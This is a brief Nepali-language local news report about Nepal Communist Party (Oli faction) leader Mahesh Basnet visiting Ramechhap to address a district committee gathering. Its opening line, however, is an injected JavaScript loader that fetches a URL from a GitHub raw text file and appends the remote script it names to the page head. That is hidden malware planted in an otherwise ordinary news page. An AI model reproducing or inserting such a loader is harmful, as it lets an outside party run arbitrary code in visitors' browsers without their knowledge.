;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
माघ १५,
रामेछाप । नेपाल कम्युनिष्ट पार्टी (नेकपा) ओली समुहका नेता महेश बस्नेत आज रामेछाप आउने भएका छन् ।
सो समुहको दोस्रो जिल्ला कमिटी भेलालाई सम्बोधन गर्न बस्नेत आज (बिहिबार) रामेछाप आउन लागेका हुन् । अहिले केहीबेरमा जिल्ला समन्वय समितिको प्रांगणमा हुने भेलालाई बस्नेत सहित केन्द्रीय सदस्य तथा बागमती प्रेदेशका आर्थिक मामिला तथा योजना मन्त्री कैलाश ढुङ्गेलले भेलालाई सम्बोधन गर्दै छन् ।
ढुङ्गेल बुधबार साँझै जिल्ला सदरमुकाम आइसकेका छन् ।
फेसबुक प्रतिक्रियाहरु